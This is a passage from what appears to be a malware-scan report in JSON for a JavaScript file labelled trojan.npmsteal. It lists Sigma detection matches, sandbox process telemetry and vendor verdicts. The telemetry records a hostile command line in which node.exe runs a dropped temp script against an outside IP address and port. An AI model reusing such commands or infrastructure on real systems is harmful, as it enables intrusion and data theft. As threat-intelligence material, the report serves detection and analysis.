"rule_id": "b0d225f3239543a37159ba2855ee1e7972c6bff3c83ce7aed9056599f6ee6314",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Process Discovery With Get-Process",
"rule_description": "Get the processes that are running on the local computer.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Get-Process | Select-Object -ExpandProperty ProcessName",
"Path": "",
"ScriptBlockId": "4a699416-4dc6-4cf2-a450-ed73b5aa1879",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "cbca1653e08da61570de76b640bc3c052d7693b9d8f4232af2317ce235b85eab",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "NodeJS Execution of JavaScript File",
"rule_description": "Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious.\nNode.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development.\nAdversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems.\nBecause Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=0B7BE00E24F693AD846B1E70848830FD,SHA256=FDDDBF4581E046B8102815D56208D6A248950BB554570B81519A8A5DACFEE95D,IMPHASH=764090509664248D5254CAEEBE1E7AF5",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "node.exe",
"Product": "Node.js",
"Description": "Node.js JavaScript Runtime",
"FileVersion": "22.20.0",
"ParentCommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" \"C:\\Users\\Bruno\\Desktop\\download.js\"",
"CommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" C:\\Users\\Bruno\\AppData\\Local\\Temp\\0d07ed592d764f2546168524.js 23.254.164.123:443",
"EventID": "1",
"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
"IntegrityLevel": "High",
"Image": "C:\\Program Files\\nodejs\\node.exe",
"Company": "Node.js"
}
}
]
}
],
"last_analysis_stats": {
"malicious": 15,
"suspicious": 0,
"undetected": 43,
"harmless": 0,
"timeout": 0,
"confirmed-timeout": 0,
"failure": 2,
"type-unsupported": 14
},
"javascript_info": {
"tags": [
"write",
"malformed"
]
},
"filecondis": {
"dhash": "fabcbcaa8ed6a4d0",
"raw_md5": "8e0822b0fd0a41673f50da1b3c96f3e2"
},
"first_submission_date": 1780048232,
"popular_threat_classification": {
"popular_threat_category": [
{
"count": 6,
"value": "trojan"
},
{
"count": 2,
"value": "dropper"
},
{
"count": 1,
"value": "downloader"
}
],
"suggested_threat_label": "trojan.npmsteal/abtrojan",
"popular_threat_name": [
{
"count": 4,
"value": "npmsteal"
},
{
"count": 1,
"value": "abtrojan"
},
{
"count": 1,
"value": "aeol"
}
]
},
"type_description": "JavaScript"
}
}
}